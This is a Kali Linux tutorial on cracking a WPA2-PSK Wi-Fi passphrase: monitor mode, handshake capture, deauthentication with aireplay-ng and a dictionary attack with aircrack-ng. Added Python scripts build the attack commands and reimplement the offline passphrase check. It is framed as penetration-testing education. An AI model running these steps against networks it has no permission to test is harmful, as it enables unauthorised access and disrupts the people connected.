HACKING WPA2-PSK WITH KALI LINUX
A wireless network is a network that uses radio waves to connect computers and similar devices. The 802.11 standard behind Wi-Fi defines both the physical layer (Layer 1 of the OSI model) and the MAC sublayer of the data link layer (Layer 2); the encryption and the handshake discussed below live at Layer 2.
WPA2 (Wi-Fi Protected Access 2) is the wireless security protocol that replaced WPA. It encrypts traffic with AES in CCMP mode, the replacement for WPA's TKIP, and is stronger than the earlier protocols (WEP, WPA).
In WPA2-Personal (WPA2-PSK) the 256-bit pre-shared key is not typed in directly; it is derived from a human-chosen passphrase (PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations), and the four-way handshake between a client and the access point exposes enough material to test candidate passphrases offline. That is the weakness exploited here: not a flaw in AES or CCMP, but a guessable passphrase. Doing so requires software and hardware resources, and patience. Success also depends on how active the users of the target network are, because a handshake can only be captured when a client connects or reconnects. We are going to take a step-by-step look at how you can break a WPA2-PSK network using Kali Linux.
Our attack tool is the aircrack-ng suite in Kali Linux, and we will employ sniffing: intercepting frames as they are transmitted over the air. If you feel you have the necessary skills, let's begin:
These are things that you’ll need:
● A successful install of Kali Linux (which you can easily obtain).
● A wireless adapter whose driver supports monitor mode and packet injection. Some computers have such cards from the factory, but many do not; check yours before starting.
● Be within radio range of the target network (and, for the deauthentication step, of at least one of its clients).
● A wordlist to attempt to “crack” the password once it has been captured.
● Time and patience.
If you have these, then roll up your sleeves and let’s see how secure your network is!
Important notice: hacking into anyone's Wi-Fi without permission is a crime in most countries. This tutorial is for penetration testing and for learning how to make your own network more secure, and I am using my own test network and router.
Step 1:
Open a terminal and type iwconfig to find the name of your wireless adapter. Look at the result (here my wireless adapter is 'wlan0').
Your computer has several network interfaces, so to scan with one you need to know its name. The ones you will see are:
● lo - loopback. Not relevant here.
● eth - Ethernet (wired).
● wlan - This is what we want. Note the numeric suffix (wlan0, wlan1, and so on); you will type it in every command below.
Step 2:
Enable Monitor Mode
We use airmon-ng to put the card into monitor mode, so that it receives every frame on a channel rather than only the frames addressed to it.
Type airmon-ng start followed by the interface name of your wireless card. Mine is wlan0, so my command would be: airmon-ng start wlan0. If airmon-ng warns about processes that could interfere (NetworkManager, wpa_supplicant), run airmon-ng check kill first and then start monitor mode again.
Recent versions of airmon-ng rename the interface instead of creating a separate virtual one; here the monitor-mode interface is called wlan0mon, and that is the name used for the rest of this tutorial.
Step 3:
Capturing Packets.
We'll use airodump-ng to capture frames from the air. Run on its own, it hops across channels and lists every wireless network within reach, with a lot of useful information about each: BSSID, channel, encryption type, and the stations connected to it. Type airodump-ng followed by the name of the monitor interface:
● airodump-ng wlan0mon
Locate the network you are going to attack (make sure it is your own network or one you have permission to test). Once you've spotted it in the ever-growing list, hit Ctrl + C on your keyboard to stop the scan, and note the BSSID and channel of your target network.
Our test network is "mask".
You can also force the wireless card to scan and report all wireless networks in the vicinity using this command:
As you can see from the figure above, our target network ("mask") is also displayed.
Focus on the Target Network
Our next step is to focus our efforts on "mask" and capture frames only from it, so the card stays on the right channel and the capture file stays small. We need the BSSID and channel to do this. Let's open another terminal and type:
● airodump-ng --bssid [BSSID of mask] -c [channel] --write [output file prefix] [interface]
As you can see in the screenshot above, we're now capturing only from the one AP/router with an ESSID of mask on channel 11.
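Picking the BSSID, channel and a connected client out of the airodump-ng scan by hand is error-prone, and airodump-ng also writes everything it saw to a CSV file next to the capture. The script below is an added example (not part of the original tutorial and not code from aircrack-ng) that parses that CSV layout and produces the two commands used in the next steps. The CSV text in it is constructed for this example in the airodump-ng column layout; every MAC address, timestamp and ESSID in it is made up, and the output prefix WPAPSKCRACK and interface wlan0mon are the ones this tutorial uses.

```python
"""Select the target AP and its clients from an airodump-ng CSV dump.

Added example, not part of the original tutorial or of aircrack-ng. It
parses the two tables airodump-ng writes to <prefix>-01.csv (access
points first, then stations, separated by a blank line) and returns what
the next two commands need: BSSID and channel for airodump-ng, and a
client MAC for aireplay-ng. The CSV below is constructed; all values are made up.
"""
import csv
import io

# Constructed excerpt in the airodump-ng CSV layout (column names as airodump-ng writes them).
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 130, WPA2, CCMP, PSK, -40, 120, 0, 0. 0. 0. 0, 4, mask,
AA:BB:CC:DD:EE:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 6, 54, WPA2, CCMP, PSK, -70, 80, 0, 0. 0. 0. 0, 8, neighbor,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -45, 300, AA:BB:CC:DD:EE:01, mask
77:88:99:AA:BB:CC, 2024-01-01 10:02:00, 2024-01-01 10:05:00, -60, 50, AA:BB:CC:DD:EE:02, neighbor
DE:AD:BE:EF:00:01, 2024-01-01 10:03:00, 2024-01-01 10:05:00, -80, 3, (not associated),
"""


def _table(text: str) -> list[dict]:
    """Parse one CSV table into dicts keyed by its stripped header names."""
    rows = [r for r in csv.reader(io.StringIO(text), skipinitialspace=True) if r]
    header = [h.strip() for h in rows[0]]
    return [dict(zip(header, (c.strip() for c in row))) for row in rows[1:]]


def parse_airodump_csv(text: str) -> tuple[list[dict], list[dict]]:
    """Split the dump into its access-point table and its station table."""
    ap_part, _, station_part = text.partition("\n\n")
    return _table(ap_part), _table(station_part)


def find_target(text: str, essid: str):
    """Return BSSID, channel and associated client MACs for `essid`, or None if unseen."""
    aps, stations = parse_airodump_csv(text)
    for ap in aps:
        if ap.get("ESSID") != essid:
            continue
        # Stations whose BSSID column is this AP are its associated clients;
        # "(not associated)" rows are probing devices and are skipped naturally.
        clients = [s["Station MAC"] for s in stations if s.get("BSSID") == ap["BSSID"]]
        return {"bssid": ap["BSSID"], "channel": int(ap["channel"]), "clients": clients}
    return None


def next_commands(target: dict, prefix: str, iface: str) -> list[str]:
    """The focused-capture and deauth commands for this target, in aircrack-ng syntax."""
    cmds = [f"airodump-ng --bssid {target['bssid']} -c {target['channel']} --write {prefix} {iface}"]
    if target["clients"]:
        # -c aims the deauth at one station instead of broadcasting it to every client.
        cmds.append(f"aireplay-ng --deauth 5 -a {target['bssid']} -c {target['clients'][0]} {iface}")
    return cmds


if __name__ == "__main__":
    target = find_target(SAMPLE_CSV, "mask")
    print(target)
    for cmd in next_commands(target, "WPAPSKCRACK", "wlan0mon"):
        print(cmd)
```

Run it against your own prefix-01.csv by replacing SAMPLE_CSV with the file's contents; the station table is what tells you whether a deauth has any client to hit.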
Capture the handshake
Leave the airodump-ng window open; it will tell us when we have a WPA2 handshake. The four-way handshake does not carry the passphrase itself, encrypted or otherwise: it carries two nonces and a message integrity code (MIC) computed with a key derived from the PSK. That is enough to check passphrase guesses offline, so we need to catch a client in the act of authenticating to the AP/router to get a valid capture. When airodump-ng sees a complete handshake it prints a "WPA handshake:" confirmation with the BSSID in the upper right corner of the screen.
If nobody connects, we can also de-authenticate an already connected client (kick it off); its system will automatically re-authenticate, and we capture the 4-way handshake as it does so.
The two scenarios:
1. waiting
What we're really doing now is waiting for a device to connect. Once that happens, we get a handshake, as shown below:
2. force re-authentication
If you don't want to wait for a new device to connect, use another tool from the aircrack-ng suite, aireplay-ng. Instead of waiting, we force an already connected device to reconnect by sending deauthentication (deauth) frames to it, so that it re-authenticates with the network while we are capturing. Deauth frames are management frames, which WPA2 leaves unauthenticated unless the network uses 802.11w (Protected Management Frames); on a PMF-protected network the client ignores forged deauth frames and this step fails.
Here we have a client already connected. Let's open another terminal and type:
● aireplay-ng --deauth [number of deauth frames] -a [BSSID] -c [client MAC] [interface]
Without -c the deauth is broadcast to every client of the AP; with -c it targets one station, which is less noisy. Use a small count (a handful of frames is usually enough) and watch the airodump-ng window; a large count only disrupts everyone on the network.
…and we have our handshake!
Also, several files with your chosen prefix (among them the -01.cap capture file) show up in the directory where you ran airodump-ng; the .cap file is where the handshake is saved when captured, so don't delete them!
Crack the Password
Here is the fun part! Now that we have the handshake in our capture file WPAPSKCRACK-01.cap (airodump-ng appends -01 to the prefix you gave it), we can run that file through aircrack-ng with a wordlist of our choice. I created a customized wordlist called wordlist.txt with crunch, and will be using it to recover the passphrase for mask. This wordlist is located on my desktop.
We'll now attempt to crack the password by opening another terminal and typing:
● aircrack-ng [captured packet file] -w [absolute path to our wordlist]
If the capture contains handshakes from more than one network, add -b [BSSID] (or -e [ESSID]) so aircrack-ng knows which one to attack.
Cracking the password might take a long time depending on the size of the wordlist: every candidate costs 4096 iterations of PBKDF2 before it can be checked against the handshake, so CPU time per guess is the bottleneck. Mine went very quickly because the wordlist was small and contained the passphrase. Remember that this type of attack is only as good as your wordlist; a long random passphrase simply is not in any list.
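What aircrack-ng is doing for each word in the list is the following, shown here as an added example (not code from the original tutorial or from aircrack-ng): derive the PMK from the candidate passphrase and SSID, expand it into the PTK with the two MAC addresses and two nonces from the handshake, and recompute the MIC of handshake message 2 with the first 128 bits of the PTK; a match means the candidate is the passphrase. Every handshake value in the block (SSID "mask", the MAC addresses, nonces, EAPOL frame and wordlist) is constructed for the example, and the "captured" MIC is computed from the true passphrase so that the example is self-consistent without a real capture. The PBKDF2 step is checked against the published IEEE 802.11i test vector (passphrase "password", SSID "IEEE").

```python
"""Offline WPA2-PSK passphrase check against a captured four-way handshake.

Added example, not code from the original tutorial or from aircrack-ng.
It implements the WPA2-PSK key schedule that makes the dictionary attack
possible (PBKDF2 -> PMK, PRF-512 -> PTK, HMAC-SHA1-128 MIC over EAPOL
message 2) and tries wordlist candidates until one reproduces the MIC.
All handshake values and the wordlist below are constructed.
"""
from typing import Optional
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    # IEEE 802.11i PSK derivation: PBKDF2-HMAC-SHA1, SSID as salt, 4096
    # iterations, 256-bit output. This is the expensive step per guess.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11 PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ...
    # concatenated and truncated; 512 bits needs four 160-bit blocks.
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # Both sides sort the addresses and nonces so they derive the same PTK.
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame)[:16],
    # computed over the whole EAPOL-Key frame with its MIC field zeroed.
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def check_candidate(passphrase: str, hs: dict) -> bool:
    """True if `passphrase` reproduces the MIC recorded in handshake `hs`."""
    pmk = derive_pmk(passphrase, hs["ssid"])
    ptk = derive_ptk(pmk, hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])
    kck = ptk[:16]  # first 128 bits of the PTK are the Key Confirmation Key
    return hmac.compare_digest(eapol_mic(kck, hs["eapol_zeroed_mic"]), hs["mic"])


def crack(hs: dict, wordlist) -> Optional[str]:
    """Return the first passphrase in `wordlist` that matches, else None."""
    for word in wordlist:
        if check_candidate(word.strip(), hs):
            return word.strip()
    return None


def build_eapol_msg2(snonce: bytes, rsn_ie: bytes) -> bytes:
    # Constructed EAPOL-Key frame in the layout of handshake message 2
    # (the message carrying the client's MIC), with the MIC field zeroed.
    body = (b"\x02"                   # descriptor type: RSN
            + b"\x01\x0a"             # key info: version 2, pairwise, MIC present
            + bytes(2)                # key length
            + (1).to_bytes(8, "big")  # replay counter
            + snonce
            + bytes(16)               # key IV
            + bytes(8)                # key RSC
            + bytes(8)                # key ID
            + bytes(16)               # MIC (zeroed)
            + len(rsn_ie).to_bytes(2, "big")
            + rsn_ie)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


# --- constructed handshake: every value below is made up for this example ---
TRUE_PASSPHRASE = "maskpass123"
AP_MAC = bytes.fromhex("aabbccddee01")
CLIENT_MAC = bytes.fromhex("112233445566")
ANONCE = hashlib.sha256(b"anonce-example").digest()
SNONCE = hashlib.sha256(b"snonce-example").digest()
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # WPA2-PSK/CCMP RSN IE
EAPOL_MSG2 = build_eapol_msg2(SNONCE, RSN_IE)
HANDSHAKE = {"ssid": "mask", "ap_mac": AP_MAC, "client_mac": CLIENT_MAC,
             "anonce": ANONCE, "snonce": SNONCE, "eapol_zeroed_mic": EAPOL_MSG2}
# The MIC an attacker copies out of the capture, produced here from the true passphrase.
HANDSHAKE["mic"] = eapol_mic(
    derive_ptk(derive_pmk(TRUE_PASSPHRASE, "mask"), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16],
    EAPOL_MSG2)
WORDLIST = ["password", "12345678", "qwertyuiop", "maskpass123", "letmein1"]  # constructed

if __name__ == "__main__":
    print("recovered:", crack(HANDSHAKE, WORDLIST))
```

Nothing in the frame has to be decrypted: the attacker only needs the two nonces, the two addresses and the MIC, which is why capturing message 2 (or messages 2 and 3) is enough, and why the only defence on the passphrase side is a passphrase long and random enough that no wordlist will contain it.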
Here we are:
Proof Of Concept
Let's try to log in with the password we found:
As you can see, we are connected.
Note the channel (11).
Now that we are on the network, the attack can be taken further, as far as attacking the connected systems.